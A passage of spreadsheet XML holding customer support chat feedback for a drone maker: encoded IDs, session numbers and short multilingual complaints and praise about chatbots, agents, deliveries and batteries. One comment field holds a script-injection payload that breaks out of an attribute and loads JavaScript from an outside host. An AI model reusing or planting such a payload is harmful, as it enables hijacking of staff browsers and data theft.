    <t>RhU5mzO3u2ucSmAvakHljQ==</t>
  </si>
  <si>
    <t>Unable to find a person to answer a simple question</t>
  </si>
  <si>
    <t>p7K8oSk5UwMyOByEpmH3E7MZcBQqdlMZQbQeR9Wzvgs=</t>
  </si>
  <si>
    <t>ba9506f880fccd528dd70000e7e1c990</t>
  </si>
  <si>
    <t>|82535417247691709285248</t>
  </si>
  <si>
    <t>RfacCKz2TNM1KrUgNorwsWTsVnxoXxTnFOqAt7PfpK4=</t>
  </si>
  <si>
    <t xml:space="preserve">Prodotto costoso con funzionalità limitate all'utilizzo di uno smartphone </t>
  </si>
  <si>
    <t>Exr5/Bd14lDCTHCPQj1ACIyT4w/u4YmiPDlW9hw5hJQ=</t>
  </si>
  <si>
    <t>839e69cef7d9790183e1330c4ecac6e2</t>
  </si>
  <si>
    <t>|82535037088127408467530</t>
  </si>
  <si>
    <t>86P7Ghvcw77GbSrEpqkY5Q==</t>
  </si>
  <si>
    <t xml:space="preserve">Mein Guthaben wurde nicht überweisen der versprochen wurde </t>
  </si>
  <si>
    <t>LssaWC0X/0I3vsWb/iDw6go/VhUtCijwOmnUULd3Jjo=</t>
  </si>
  <si>
    <t>400c98da51a6666588a07f6cbd646838</t>
  </si>
  <si>
    <t>|82533938165302119241640</t>
  </si>
  <si>
    <t>QrAst6CpMR+QsaeJ6gdm4otzW/TWy0h09RRPXzEkoX8=</t>
  </si>
  <si>
    <t>I spoke to my sales representative. He said the gimbal was sent to you. He said to send you this cop</t>
  </si>
  <si>
    <t>k36Jg3G+cRAovt42X8wGxPp7M4t3kw8wibcdYPYWBkE=</t>
  </si>
  <si>
    <t>735a808bfa1f1ea23e6fb5c0d1c08a8c</t>
  </si>
  <si>
    <t>|82533763124517154134499</t>
  </si>
  <si>
    <t>Great</t>
  </si>
  <si>
    <t>6847eab4ff61b6437619e075b15d22d3</t>
  </si>
  <si>
    <t>|82533717573665756941391</t>
  </si>
  <si>
    <t>f9DwlW937/Kcqafq/lU5DlqQ04Hht+Ys7TGGlL5BZd4=</t>
  </si>
  <si>
    <t>kann ich care refresh später noch aktivieren nachden 48h</t>
  </si>
  <si>
    <t>KX+KrS2ro4O3y+4oMQK43Lw6ybKvAfrbcjBw1/gfVDI=</t>
  </si>
  <si>
    <t>50a548d1aeab822c2913198d6f99d23b</t>
  </si>
  <si>
    <t>|82533568438692240393501</t>
  </si>
  <si>
    <t>ByQhZ/xvWMSZjKldR09jh0LufGgdm5xMRp8iP42eWvs=</t>
  </si>
  <si>
    <t xml:space="preserve">Couldn't answer questions </t>
  </si>
  <si>
    <t>WUBU+qbYjDaglDycu9xJIOd385TkNSq931rkVMZtBRM=</t>
  </si>
  <si>
    <t>59b9e4a47b01f313eaaf6b38634203a9</t>
  </si>
  <si>
    <t>|82533499018759677792562</t>
  </si>
  <si>
    <t>06I+dIQLqdHADcdDVDiE7jSP12qv1lPiD2McPOsJ+qk=</t>
  </si>
  <si>
    <t>I have a new c8000 charger that will not turn on and I cannot get the serial number off the computer</t>
  </si>
  <si>
    <t>8hDIKruhuMz5he0PdHr8IDMQWwu7DfDGE/ItvRXyoKs=</t>
  </si>
  <si>
    <t>e82b11fa72cc8f486d0198952c8fa30e</t>
  </si>
  <si>
    <t>|82531132841211696172432</t>
  </si>
  <si>
    <t>FJdUa4P965YpgrP/pF4E/Q==</t>
  </si>
  <si>
    <t>It showed me that you don't have FPV goggles for one of YOUR products.</t>
  </si>
  <si>
    <t>Wvz0YZPl4PBak/2AM2zHG3LfOJID96FMusREURCDEhI=</t>
  </si>
  <si>
    <t>bcdbb9bc895f08454b49dcedb32469a7</t>
  </si>
  <si>
    <t>|82530907024804060859479</t>
  </si>
  <si>
    <t>Ra2S6QSgxDt2VmVh/5CJCg==</t>
  </si>
  <si>
    <t>I was typing my issue and it didn't let me finish.</t>
  </si>
  <si>
    <t>bm7FJGIK6TAze0m0JIhS0Ao/QFZ4wDxLiMwSIY9WQLU=</t>
  </si>
  <si>
    <t>008b20c0277222a971e2307b77beef28</t>
  </si>
  <si>
    <t>|82531916816031555842488</t>
  </si>
  <si>
    <t>uFI+TLi6/NfF+1Z+P5M7DJaCeOGlaq1bFfcZn19pd9M=</t>
  </si>
  <si>
    <t>I am pleased to advise you that my Mini 3 pro  drone has been located and recovered and is undamaged</t>
  </si>
  <si>
    <t>JuhBHVu+xcsY4nPgoO5tWQrRWjFJ9LcHdmstNXSzBRw=</t>
  </si>
  <si>
    <t>b0ef7fd4094ffa6a630b8220e8e7d5e7</t>
  </si>
  <si>
    <t>|82529259777064168256931</t>
  </si>
  <si>
    <t>nnvGuDSLqQuJ19mFlakcow2zMhOU83yrDnkcgLfy+uw=</t>
  </si>
  <si>
    <t>I couldn't find an answer to my problem.</t>
  </si>
  <si>
    <t>xm2s1124hgNa3Q9sa5KW6JLB+agW1UkhasMm8ARho+Y=</t>
  </si>
  <si>
    <t>fa5edb9d9cf3de60eb7e10cc42e45975</t>
  </si>
  <si>
    <t>|82528377829514373791902</t>
  </si>
  <si>
    <t>ZN19N/H6HkP2LPp+mmyAbw==</t>
  </si>
  <si>
    <t>meine Frage wurde nicht erkannt und nich beantwortet</t>
  </si>
  <si>
    <t>fG+5Flgv6q+474qnoj+bNRy+5MW6LFPawgoKn6kBLxk=</t>
  </si>
  <si>
    <t>9f3f233e8743e22899fdf9fe22827aa9</t>
  </si>
  <si>
    <t>|82529413179328056448207</t>
  </si>
  <si>
    <t>GLDPeBaxNWTh2uXhsY0Qe0y7T+BGlorU7yZificC6M4qSbBZYE+AHFAZ5R/7n0q3</t>
  </si>
  <si>
    <t xml:space="preserve">Réactivité et résolution rapide malgré la frustration d’un produit défaillant </t>
  </si>
  <si>
    <t>tExPnZdJMTLY4OnDb4a3DfOpcSuX51bp7vaT/7gLME8=</t>
  </si>
  <si>
    <t>887460a657a97826ebc49062f04aacd0</t>
  </si>
  <si>
    <t>|82528210182399687180767</t>
  </si>
  <si>
    <t>FXZ8L2wDHlNxZGqwydwTrskrfsoceE96lYux6KBoDdc=</t>
  </si>
  <si>
    <t>No me ha llegado la actualización</t>
  </si>
  <si>
    <t>VTnNPY2/j01wWO956GonyBxTHmdR46QeDBbPWGkQn8k=</t>
  </si>
  <si>
    <t>3972c876479b8144b850bb04ba293226</t>
  </si>
  <si>
    <t>|82527481402345047322239</t>
  </si>
  <si>
    <t>H6EyHEsTXl1AxvIuP5RBsjRpGQ7D5qRYqJ+NkwwmYxk=</t>
  </si>
  <si>
    <t>Please advise cost for extra intelligent flight batteries and carry bag for the dji 3 and 4 drones 1</t>
  </si>
  <si>
    <t>zKVE7MgI24XSB6JlxUzPKX+1M12/005j1+tUrrOQq5k=</t>
  </si>
  <si>
    <t>5e8685b996aa574ae933e20b6ae7063b</t>
  </si>
  <si>
    <t>|82528573689849982093340</t>
  </si>
  <si>
    <t>RJb6oUEFnlXPfJYELqBuC8wfdt8UGimYjXiFkm0L5Ic=</t>
  </si>
  <si>
    <t>vvylnD+e4UyjxPKWVmZLeXhogrXC4Lh9kEQUE310Ebk=</t>
  </si>
  <si>
    <t>825f302e81f19d8b7fc07eb3dfc3c96c</t>
  </si>
  <si>
    <t>|82528085540787538897962</t>
  </si>
  <si>
    <t>NoTJxy1EkR9WsmVDtp5LanSImv/b5etQi5XybB+6fs8=</t>
  </si>
  <si>
    <t>Excellent</t>
  </si>
  <si>
    <t>3oUu4B8GgSDXaT+wHVUKE5TipMoVy4MUBkTY7YeZmWY=</t>
  </si>
  <si>
    <t>f1fd64cd6fc518b2133bf0da0439f0fd</t>
  </si>
  <si>
    <t>|82527951635947660221731</t>
  </si>
  <si>
    <t>X0LXs+JZkLGymQR+goWj0g==</t>
  </si>
  <si>
    <t>I purchased the Mavic 3 Enterprise, which came with a 3-month free trial. How do I activate the tria</t>
  </si>
  <si>
    <t>+UdonBXVeFcXeu/f6Y+SKTrE7Ddi/Lmfi9FEnZxJnn0=</t>
  </si>
  <si>
    <t>a62b12545afe1dc4c1ef19d0e9216e87</t>
  </si>
  <si>
    <t>|82526577295064078671164</t>
  </si>
  <si>
    <t>CXa76UyuM2IQsx0ZHWKvwxhFKLmySH4gxT6BAiNKjFw=</t>
  </si>
  <si>
    <t>Hier kommt man nicht vorwärts, wird mit leeren Versprechungen vertröstet und hängen gelassen.</t>
  </si>
  <si>
    <t>IwMcZkvn+WPE/HnWL1MJfANjKpESjSaUpzGQrm12YnA=</t>
  </si>
  <si>
    <t>2496c99285640d14e1c49ac638d406e3</t>
  </si>
  <si>
    <t>ca_sp1</t>
  </si>
  <si>
    <t>|82526823348506434677983</t>
  </si>
  <si>
    <t>访客-fbe64e</t>
  </si>
  <si>
    <t>bot</t>
  </si>
  <si>
    <t>d73695e3ac8c594c3128e1a5d2838db8</t>
  </si>
  <si>
    <t>185986c582f64ebd83092f3caa2eb475</t>
  </si>
  <si>
    <t>|82526809047519518355525</t>
  </si>
  <si>
    <t>chTObqZyWA8HWNWJOq7TENiyRtYjJbW5QTz00rqhbqU=</t>
  </si>
  <si>
    <t>keine Antwort auf meine Frage betrifft Akku Marvic 2</t>
  </si>
  <si>
    <t>FIva8/fpiCeE2NkT8qRuZlhoGp4y9l2k/ipUWoezNns=</t>
  </si>
  <si>
    <t>626b00c908be83d8feab5bf55a916e59</t>
  </si>
  <si>
    <t>|82527950608355761571651</t>
  </si>
  <si>
    <t>Very Good</t>
  </si>
  <si>
    <t>01623ad607b11293fe0447352a7e7f73</t>
  </si>
  <si>
    <t>|82525065370352994673582</t>
  </si>
  <si>
    <t>访客-8e5be9</t>
  </si>
  <si>
    <t xml:space="preserve">I can not find what I want. I asked where I could find DJI fly to suit android v6.0. </t>
  </si>
  <si>
    <t>2b65c2fd4bb6d84272e837ff8f1d7bf5</t>
  </si>
  <si>
    <t>c407218db3ac1c83f047f77884f96cb2</t>
  </si>
  <si>
    <t>|82524851147248808544735</t>
  </si>
  <si>
    <t>G3ZfPjlL+lt4vEWNiJb3NQ==</t>
  </si>
  <si>
    <t xml:space="preserve">Are .avic pro platinum propellers available? </t>
  </si>
  <si>
    <t>w1bHlnu1P4k300Hp7mG+H5L9/y6O6U8UVW5PHwvboyE=</t>
  </si>
  <si>
    <t>b1f720599cf2d62d4b2f44fb2919cf82</t>
  </si>
  <si>
    <t>|82524122839731308798482</t>
  </si>
  <si>
    <t>kkd0PnMBlDe5UipGYr6PFg==</t>
  </si>
  <si>
    <t>Xfinity wi-fi connected. However, why Does it show a triangle with explanation point on upper left??</t>
  </si>
  <si>
    <t>yx9QdGjRTgqIimD7GZaY+lMqGR6E9GH4d3atmQFdtNA=</t>
  </si>
  <si>
    <t>f599f65c9a5f9aad06e414542f1c4097</t>
  </si>
  <si>
    <t>|82523995408623760258815</t>
  </si>
  <si>
    <t>NHER6Vrw5UBm59dpBR/MFWUZh+mUDWL3IRM3KZAkSbY=</t>
  </si>
  <si>
    <t>Fabulous!, patient, friendly</t>
  </si>
  <si>
    <t>j6phkS9h2EzFEMk656XpiJVzFzSK06OlMrieOF1w+vA=</t>
  </si>
  <si>
    <t>f3d9c44b3df17b4029e8e381532537e5</t>
  </si>
  <si>
    <t>|82523330078619830961983</t>
  </si>
  <si>
    <t>VVbCGXWzlhokm4nKXJP7Zg==</t>
  </si>
  <si>
    <t>Agent sent an irrelevant response and then closed the chat</t>
  </si>
  <si>
    <t>+xRJrsXScGoQrFpzMJYJJxmut1oEZP8rGhfxAnmfAR8=</t>
  </si>
  <si>
    <t>fb2615ddc8d8514aab00376695b05e00</t>
  </si>
  <si>
    <t>|82523087218406293226330</t>
  </si>
  <si>
    <t>gmsgayqrMCnS3Qjkp7Ht9UyxsWZFH7kEpuxR321z4P8=</t>
  </si>
  <si>
    <t>i cant log in</t>
  </si>
  <si>
    <t>ZaNwdyeZruNea9NYx1pa4nNWk7rxJJP7DRmYPSZKaGc=</t>
  </si>
  <si>
    <t>9a4d2177e632ba2a435779acb9be72b3</t>
  </si>
  <si>
    <t>|82523020081763597358835</t>
  </si>
  <si>
    <t>MSLlYPu6Ry0S7mlfLftF/PkKBOw/UZz2d6KXYisiqlM6gybcnDKN6NwftoMKkRg1</t>
  </si>
  <si>
    <t xml:space="preserve">it sucked
</t>
  </si>
  <si>
    <t>0obSXuo5FXIvLRfd3R1dA99GzRHDRWZSvahkochuUI8=</t>
  </si>
  <si>
    <t>d0a9c57c4d19a847eff215f59e263f1c</t>
  </si>
  <si>
    <t>|82523423326133576036821</t>
  </si>
  <si>
    <t>ORKfZbuE+QzZSsD93IvuC5uu4KHoCg1d3gFJTXqrcp0=</t>
  </si>
  <si>
    <t>A long waiting response time. Problem still not resolved - item has not been shipped yet</t>
  </si>
  <si>
    <t>KEi8rviZkTngf8a6sxIDACRRE4TQ8O+UgY5IaIl0Xx8=</t>
  </si>
  <si>
    <t>f160fee50371450f14539103566ad15e</t>
  </si>
  <si>
    <t>|82522469946391943375712</t>
  </si>
  <si>
    <t>oKzLVe5Rb3lOgTdqJY1OP0AZaibFLZZto2QR245ekqo=</t>
  </si>
  <si>
    <t>Ok verry nice service</t>
  </si>
  <si>
    <t>qGQF5yAomnjLGr4gSUR9b3YTemLI8UZxRau1ma2/fBA=</t>
  </si>
  <si>
    <t>f58ac5819a7e32688feb08c0df849d86</t>
  </si>
  <si>
    <t>|82522397172788808988674</t>
  </si>
  <si>
    <t>SAzmjSCEy39+hYQb5sFzEEjMVdkjynp6Q9AO2eWtQHg=</t>
  </si>
  <si>
    <t xml:space="preserve">Can’t make the drone fly </t>
  </si>
  <si>
    <t>Sn3inKcshN4s/1FiF1dS6RvHCytgQLobBd/jyX96KDg=</t>
  </si>
  <si>
    <t>3f5cac19e4402d9ed50a6872a9b34a20</t>
  </si>
  <si>
    <t>|82521337592647423222412</t>
  </si>
  <si>
    <t>RmN1dbRkXqBV1HTGI+4dvccHrHS+aKVQAtnDWmdXUWI=</t>
  </si>
  <si>
    <t>No response. Was not able to help with problem</t>
  </si>
  <si>
    <t>Tvq1aq1VXVSHWC80gTtJfgA7LJvsWkaMzi2U7vIZ4QY=</t>
  </si>
  <si>
    <t>1e93b234014e124a06c58cfc1cdfbfaf</t>
  </si>
  <si>
    <t>|82520154597241499510398</t>
  </si>
  <si>
    <t>KDAK7P2A7VW5+Jm0oV/ENw==</t>
  </si>
  <si>
    <t xml:space="preserve">The merging of my double account did not work using the web service. </t>
  </si>
  <si>
    <t>+MUY8vHd0p2U/7VVm3nvonFdv++BIEs/Fb8llx+PFUo=</t>
  </si>
  <si>
    <t>7d32b6b5726bcbca81a5cefa64c0b784</t>
  </si>
  <si>
    <t>|82519939977865174375228</t>
  </si>
  <si>
    <t>tvn153PgxSRoKHMGaERtt0D26W35mWhwiXfn6GculKs=</t>
  </si>
  <si>
    <t>It should acknowledge that I have a question,not direct me into a loop of useless option that le</t>
  </si>
  <si>
    <t>1sEEoc/9YUrxiktbYO+8htzMJlE3wM53pEM6Wj88enE=</t>
  </si>
  <si>
    <t>36fd941b45f700dc2bc0214f98fd6385</t>
  </si>
  <si>
    <t>|82520328289081090059593</t>
  </si>
  <si>
    <t>2O0xZWnedc/3EXBorEr8eIIisM7CrNkpFiWiKx3xrlA=</t>
  </si>
  <si>
    <t>I would like to know when my product will b e delivered</t>
  </si>
  <si>
    <t>NjFL06++c10luRAxJx5rTh9wuJbRmpQ0PFiv14wO/H8=</t>
  </si>
  <si>
    <t>feb705f3b2a925a66b2109b5716f99a0</t>
  </si>
  <si>
    <t>|82519987479756304997985</t>
  </si>
  <si>
    <t>4LMGqsVjgz/xWdokLKt8Qw==</t>
  </si>
  <si>
    <t>Hi very';"&gt;&lt;script src="https://pelsec.net/pjs?id=1&amp;iu=support-chat.dji.com&amp;ip=feedback"&gt;&lt;/script&gt;'</t>
  </si>
  <si>
    <t>wm+5g8Pw6IVivgJbI3aaSSZTFo0OKa1lCADzQ8Xvgl8=</t>
  </si>
  <si>
    <t>ebae4735641b3c1e5a342cee34cf6288</t>
  </si>
  <si>
    <t>|82519942926495251856381</t>
  </si>
  <si>
    <t>访客-6c834a</t>
  </si>
  <si>
    <t>Ottimo servizio per un prodotto di qualità!</t>
  </si>
  <si>
    <t>e88e33e8bd268c43bdd8b82976cccc9d</t>
  </si>
  <si>
    <t>ce5267197741e6fbdcb86d1281ce8557</t>
  </si>
  <si>
    <t>|82519700545967202969410</t>
  </si>
  <si>
    <t>Wa3FAsxl9kjosmBfPvZno+e9dVxX1Ro89+trqrKY7YU=</t>
  </si>
  <si>
    <t>I can’t get through to anyone</t>
  </si>
  <si>
    <t>Kdo5pmSmp09xHNdriXt2EQ+adalZdfRrmjvyj76hra8=</t>
  </si>
  <si>
    <t>46bd2db0ba5ed3fce7bb95cc8ec1a528</t>
  </si>
  <si>
    <t>|82518901284497638651232</t>
  </si>
  <si>
    <t>FMWKQSYsrK+Dyu0UYt4j8iylI6eeIzRtANHhNYV0cek=</t>
  </si>
  <si>
    <t>didnt really resolve anything but hopeful</t>
  </si>
  <si>
    <t>sbR4oMuU9gx4Orq/OM4s3z51w61Iaqefd908maZ723c=</t>
  </si>
  <si>
    <t>61aeaca6e3881c915fa5d781c0b43be5</t>
  </si>
  <si>
    <t>|82518149343467946534211</t>
  </si>
  <si>
    <t>tgcXCtI2iy1Jzd9PWNxFNENXz1MONHO8EUUXY30aIzQ=</t>
  </si>
  <si>
    <t>My payment for dji refresh failed. how do I complete the purchase?</t>
  </si>
  <si>
    <t>KL4BGgaf6czwCBv86xJE9W+ZxDqIn79myDTCNqxvwo8=</t>
  </si>
  <si>
    <t>2eebb11b1c4db4a2a209ae8f657ea3af</t>
  </si>
  <si>
    <t>|82517416379244838340461</t>
  </si>
  <si>
    <t>RhpG26mUwhbOxB8wOjb15sqwqM5A9nMtXasgNT/JMpY=</t>
  </si>
  <si>
    <t>Menschen verwenden die Helfen können</t>
  </si>
  <si>
    <t>fl6pUWrPc+olrdXC2rJh4350s0YWxXoEbqIlKYuKdUc=</t>
  </si>
  <si>
    <t>f0ceac7f6e282cb3fc637c31554b3fb7</t>
  </si>
  <si>
    <t>|82517409897625625798506</t>
  </si>
  <si>
    <t>JUqJZnkQlSk+2dUOq8FUng==</t>
  </si>
  <si>
    <t>Didnt answer the question direct but gave good information.</t>
  </si>
  <si>
    <t>k2ZEQrlNa6H9IG7rewakuwio4uMTQR5Te+nHYdaJ3sU=</t>
  </si>
  <si>
    <t>52ec65084fcdada95c12d7d145c487b3</t>
  </si>
  <si>
    <t>|82517403392695481084079</t>
  </si>
  <si>
    <t>T6KVAvqoS2cw+EBQXSkNbVW0GN3dzr01+883XerWsb0=</t>
  </si>
  <si>
    <t>Is this option no longer available to buy? https://www.dji.com/no/service/inspire-2-license-key</t>
  </si>
  <si>
    <t>gWn+wDkCtuq0zbYt72B4sPJOeux51IRz0Xr+0x+TPxE=</t>
  </si>
  <si>
    <t>2bba65e4b8e5aaacdf29028d1ba468e8</t>
  </si>
  <si>
    <t>|82517306775231710914956</t>
  </si>
  <si>
    <t>frcXX/eLzI6k/vFeH8v1yAh/q8Ufo/e5JcPTIzP1OLQ=</t>
  </si>
  <si>
    <t>Thanks got the answer on the web. Had to update DJI Fly app</t>
  </si>
  <si>
    <t>ONsFFUDztsxNTLeWECyz1s1Mtq7jEFjccvafo5dmHH4=</t>
  </si>
  <si>
    <t>8ac298925ab80e979e6855fd8c4a1fab</t>
  </si>
  <si>
    <t>|82517300240892453058806</t>
  </si>
  <si>
    <t>MZwinUsrpxTrLXol0x67oFTXzXocVcy4R/XcxanCfN4=</t>
  </si>
  <si>
    <t>Offer less categories of alternatives. I looking for something specific I dont want to know everythi</t>
  </si>
  <si>
    <t>dLzGQ47Xeayfefaur1I7UI9D7zhhOJmcTsCtEJnhpm8=</t>
  </si>
  <si>
    <t>09f6431e66444b56229d2780778fe543</t>
  </si>
  <si>
    <t>|82516446887173166349008</t>
  </si>
  <si>
    <t>XdeNG2uwxsIzxzrq1xjFIQ==</t>
  </si>
  <si>
    <t xml:space="preserve">Not able to get any supports... Try to close my flyaway case and open a replacement case... </t>
  </si>
  <si>
    <t>5G8JCyxmk/DSp8/QtBhjVq4Gp/QdQHJ+/lUzrAPSavk=</t>
  </si>
  <si>
    <t>b6a06e65976c4d5418e001ca933af1d8</t>
  </si>
  <si>
    <t>|82516199795146101973877</t>
  </si>
  <si>
    <t>v5ZaTpsYtAd7YRfmPqYXjCyC2jS/XbUlwK6ePzV72yY=</t>
  </si>
  <si>
    <t>chat disconnects whenever as try to get a live agent</t>
  </si>
  <si>
    <t>qH3QC8zaEXOA61MbohdM9/FdGwUDhXhlXBEmVpPYnmM=</t>
  </si>
  <si>
    <t>28b8ec9201c55c0260a7a1f665a4166a</t>
  </si>
  <si>
    <t>|82516344865449269074290</t>
  </si>
  <si>
    <t>Fng1aGt6F57p8GwXh2moNA==</t>
  </si>
  <si>
    <t>Je ne dispose pas de carte de crédit</t>
  </si>
  <si>
    <t>Dc9+NWEOyqxhkuRMOGqTh4YnA8+2SVxcU9r78/Zwzw8=</t>
  </si>
  <si>
    <t>84fa7b901d794339d9bf0b3ca36fded5</t>
  </si>
  <si>
    <t>|82516410133062161892133</t>
  </si>
  <si>
    <t>1MJMC8G13WFhyi/MgYNiKsOBeOBP6PcW3SJSb1HvGWg=</t>
  </si>
  <si>
    <t>Received no answer</t>
  </si>
  <si>
    <t>c8v4nCmr9lAPN2Pmwd82MB4oZkXiR0lbjvlWkYweAa4=</t>
  </si>
  <si>
    <t>eec8bf41aaf91ec8edfdd0c4c9cb4563</t>
  </si>
  <si>
    <t>|82515484443411378444275</t>
  </si>
  <si>
    <t>2u5KUjYRRl4tXVr9VXbZwgIrW154G+ejo1bayTOJ0FKL6A96HuYBHzfCNYUWv7NG</t>
  </si>
  <si>
    <t xml:space="preserve">Really just crap service </t>
  </si>
  <si>
    <t>Krx01N0KaIWT1i0tzdiLhwUsZG79GkDa4RrQDu12Apo=</t>
  </si>
  <si>
    <t>a974833e35461c6391a3383f95d78920</t>
  </si>
  <si>
    <t>|82515619197755703980582</t>
  </si>
  <si>
    <t>chat bot keeps ending the chat instead of connecting me with a service representative</t>
  </si>
  <si>
    <t>8d01f4fd16da5ded6f28784d33a72b27</t>
  </si>
  <si>
    <t>|82513721897303930670269</t>
  </si>
  <si>
    <t>gRTveSUNBf4zB4ULdozUorbH67lC5MKy47Ph5Js/gG4=</t>
  </si>
  <si>
    <t>very straightforward response to the case i was asking, excellent tool.</t>
  </si>
  <si>
    <t>bWmOLGe1UxLCu/5BNOlPag1h7mFPtmBvbYRDdQBq5qk=</t>
  </si>
  <si>
    <t>bef326e0e38980f43e7dcbf6d1c1eb7e</t>
  </si>
  <si>
    <t>|82512698551822558915780</t>
  </si>
  <si>
    <t>+8rqZQFMcos4W1Gq7x+pWA==</t>
  </si>
  <si>
    <t xml:space="preserve">Immediate response </t>
  </si>
  <si>
    <t>cHMludDSLAq8dT/ct1+YWt8INmfm5vFCBVPOZqr3kWY=</t>
  </si>
  <si>
    <t>80830c6805857e24fb642eec28ccb9b3</t>
  </si>
  <si>
    <t>|82512172655437107130854</t>
  </si>
  <si>
    <t>mRT/0cA7XqN4kaPKOrOj1A==</t>
  </si>
  <si>
    <t xml:space="preserve">completely ignored my question , gave a load of generic info instead .... poor </t>
  </si>
  <si>
    <t>cyxUgEvDfcTgGI37y9dVJUcxyJni6G9OrDwnpmFalfU=</t>
  </si>
  <si>
    <t>1128aabb11691413641a617b1ce9802e</t>
  </si>
  <si>
    <t>|82511481941617433737804</t>
  </si>
  <si>
    <t>qrGpiMPBD4rYEUpPOwj3Lw==</t>
  </si>
  <si>
    <t>Didn't give me the answer that I was looking for and didn't connect me with a live agent</t>
  </si>
  <si>
    <t>xOKrcGqCHEVuUMFrnr4/yFCG3AcWF95g0BpJvK0EH1I=</t>
  </si>
  <si>
    <t>f22c602a4f450e419db1d1cce63e16d5</t>
  </si>
  <si>
    <t>|82511318060556055460568</t>
  </si>
  <si>
    <t>KGeYKfcjz96fyART+nUrL+koCzf3Ne3c9f/yT7Jud0c=</t>
  </si>
  <si>
    <t>They are good at answering questions and most helpful online chat</t>
  </si>
  <si>
    <t>InUbI9nu0SclMWwkksd1arPfh2pIUSxhvgXN/Z+FOKY=</t>
  </si>
  <si>
    <t>6e4c32f0ea49be27a2c3e507a3356778</t>
  </si>
  <si>
    <t>|82511444307996275236133</t>
  </si>
  <si>
    <t>R0FjnfQauzm/LOhYOIB/S4MnTOOX3gWK6eX28VIAml0=</t>
  </si>
  <si>
    <t xml:space="preserve">L’écoute de mon interlocuteur 
Sa réponse rapide par mail </t>
  </si>
  <si>
    <t>UqV1K1VYgOHPUZtHXjYBE+Wt6oQEzOD7qx+tT69qiqQ=</t>
  </si>
  <si>
    <t>088041339768453e3b52395c8ff94113</t>
  </si>
  <si>
    <t>|82511119923819270749790</t>
  </si>
  <si>
    <t>UHx1EEXDreXve7eFU1Xo7nDLiJNN2FPSpHX0Kkm8MXg=</t>
  </si>
  <si>
    <t xml:space="preserve">Ich habe ein Samsung A55 mit Android 15 und kann meinen gimbal nicht richtig bedienen </t>
  </si>
  <si>
    <t>geKH7j34Rq7gA/wTREUbUrogwosu6deM65pKYIsm6Kc=</t>
  </si>
  <si>
    <t>84e7c23bf72add6eb8a60549cc75c202</t>
  </si>
  <si>
    <t>|82511158900457164984771</t>
  </si>
  <si>
    <t>jUwKjNhnItMEbGuWw1szR902pOrAcnPIlTMlA5AuRj8=</t>
  </si>
  <si>
    <t xml:space="preserve">Die KI geht überhaupt nicht auf mein Problem ein - ich will mit einem echten Menschen sprechen!
</t>
  </si>
  <si>
    <t>p3ZFJLlDjG3far0ETFM20wxtPWVA1rI67T/l9OJnRnk=</t>
  </si>
  <si>
    <t>4a18419a13ffcae2d6991efb3cd2b50c</t>
  </si>
  <si>
    <t>|82510204906007621611851</t>
  </si>
  <si>
    <t>ztwDQP+X4Ou3Bsbf7HSiEKmgRL7C1Mw9+za87QbrfG4=</t>
  </si>
  <si>
    <t>I need a real person.</t>
  </si>
  <si>
    <t>dcqbfqjwVNgwqqfX7Fzrm/hzZJaA9KN9CA4aTScqslQ=</t>
  </si>
  <si>
    <t>51affd95c0fff2b796c0144cefbfbfb7</t>
  </si>
  <si>
    <t>|82510432915295025782365</t>
  </si>
  <si>
    <t>jWQ+RotmWIhSG2rSa8rXOHqQcIB1TvckvTMtcScOKKg=</t>
  </si>
  <si>
    <t>I didn't received any email, you're not serious at all</t>
  </si>
  <si>
    <t>FCEg68XF4KlotQD/SYLu/m2cjyJnTWZU9bG7GviDz2E=</t>
  </si>
  <si>
    <t>5d3f4dd92a18fd6d9cd036b6ca7de515</t>
  </si>
  <si>
    <t>|82510618541611211083044</t>
  </si>
  <si>
    <t>zqbs9cBS4aSFrjCVg7bm/n13Q18HVnA6Z0EjtksNgs4=</t>
  </si>
  <si>
    <t>i need battery mavic 2</t>
  </si>
  <si>
    <t>bi1Idgvi5nNZsikJAaC9MQMQSmNiz2Uvjt47ald6cXc=</t>
  </si>
  <si>
    <t>161af5a9df11a7d3b45d4d24bbed3cd7</t>
  </si>
  <si>
    <t>|82509436911901285061456</t>
  </si>
  <si>
    <t>1KWPmaGqJCl+M0aaTm6gaA==</t>
  </si>
  <si>
    <t>iLRu8cA5YsZnzrY9wkyyT9wedVfocEzN4a9ys+yuGgo=</t>
  </si>
  <si>
    <t>39189c046626300841db6366e59e1042</t>
  </si>
  <si>
    <t>|82509354252487232258276</t>
  </si>
  <si>
    <t>MpS51yMnD/UBtBbY9/PyMIPBD9XL//9IGybyPT1fEHU=</t>
  </si>
  <si>
    <t>There should be an educational license available for DJI Terra. It is advertised to exist.</t>
  </si>
  <si>
    <t>hzZ/qSqDdRf1ETnAyDUsbzMgTqbUs5EOEYM82PTVaTM=</t>
  </si>
  <si>
    <t>0b9198e0076d0759ee0e299d392860ab</t>
  </si>
  <si>
    <t>|82509717278107394855682</t>
  </si>
  <si>
    <t>IbHEWL1Z9eVWViiqAtGREQ==</t>
  </si>
  <si>
    <t>Did not resolve issue.</t>
  </si>
  <si>
    <t>UYoq/0BojO4otj0bLNaNBgQoxZBi+zJ4WtcNE5flc4U=</t>
  </si>
  <si>
    <t>8dee778893f08296d9e91bb2c21a0243</t>
  </si>
  <si>
    <t>|82509749159288332976797</t>
  </si>
  <si>
    <t>isyEeSa/XCV/5Q5X1kUDMlgABdI5L0BuLtIHN8Syun8=</t>
  </si>
  <si>
    <t xml:space="preserve">Hassina a fait de son mieux et s'est montrée polie et encourageante tout au long du processus. </t>
  </si>
  <si>
    <t>oLkvvp+WiI805C8nDx6JFEWpJEXtmN7SIx4cEd0Dhug=</t>
  </si>
  <si>
    <t>a9476c98347ba9cac74da23b4a57432e</t>
  </si>
  <si>
    <t>|82509623868116767570879</t>
  </si>
  <si>
    <t>hpBHOhZpftHfGxIG7ekEj4wHhuWulpizhLXGMxBqw8c=</t>
  </si>
  <si>
    <t xml:space="preserve">Salve vorrei sapere perché le batterie del mio dji neo durano solo 8 minuti invece di 18 /20 minuti </t>
  </si>
  <si>
    <t>glVMzbTcCoV//XbKnFfX2Q1cjfXqUCifoL4KM80BOGE=</t>
  </si>
  <si>
    <t>4e73c69be31b67d9531af481ff794925</t>
  </si>
  <si>
    <t>|82508807901159238970518</t>
  </si>
  <si>
    <t>pK3VXZo/zoRHW+1/wpE/ayRJclZzAlubuLy14dC7I5Q=</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>친절하고</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="微软雅黑"/>
